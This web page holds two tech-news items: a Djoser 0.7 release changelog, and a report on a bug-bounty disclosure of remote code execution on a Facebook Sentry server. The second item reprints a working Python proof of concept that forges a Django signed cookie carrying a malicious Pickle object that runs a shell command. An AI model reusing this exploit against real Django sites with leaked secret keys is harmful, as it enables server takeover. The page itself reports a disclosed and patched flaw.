Djoser 0.7 released

New version of REST implementation of Django authentication system provides big mount of changes and features
04 September 2017   1060

What is Djoser?

REST implementation of Django authentication system. Djoser library provides a set of Django Rest Framework views to handle basic actions such as registration, login, logout, password reset and account activation. It works with custom user model.

Instead of reusing Django code (e.g. PasswordResetForm), we reimplemented few things to fit better into Single Page App architecture.

What's new in Djoser 0.7?

According to the developers, they were working for 2 months to release this version. 
List of changes:

  • Add TOKEN_MODEL setting to allow third party apps to specify a custom token model
  • Add USER_EMAIL_FIELD_NAME setting as a compatibility solution in Django < 1.11
  • Add support for Django Password Validators
  • Add HTML templates for djoser emails
  • Add flake8 integration to CI
  • Add py.test integration
  • Add Python 3.7 to CI
  • Update from coveralls to codecov
  • Update README to rST with uniform badges
  • Update djoser.views.PasswordResetView to allow non-database User.is_active
  • Update docs on topics which have been added/modified since last release
  • Remove serializers manager, so the serializers in djoser are now accessed via dot notation
  • Remove support for DRF 3.4
  • Remove support for basic auth as authentication backend
  • Refactor djoser settings module for cleaner and more pythonic/djangonic solution
  • Refactor tests into multiple files and fix some minor issues
  • Refactor some parts of codebase for better readability
  • Slightly refactor/simplify parts of djoser.utils
  • Fix all style issues reported by flake8_ in codebase
  • Fix security bug in djoser.views.UserView

See GitHub for more info.

Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
27 August 2018   606

Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name sentryagreements.thefacebook.com. When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

Facebook Vulnerability
Facebook Vulnerability

SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

Facebook Vulnerability
Facebook Vulnerability

The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.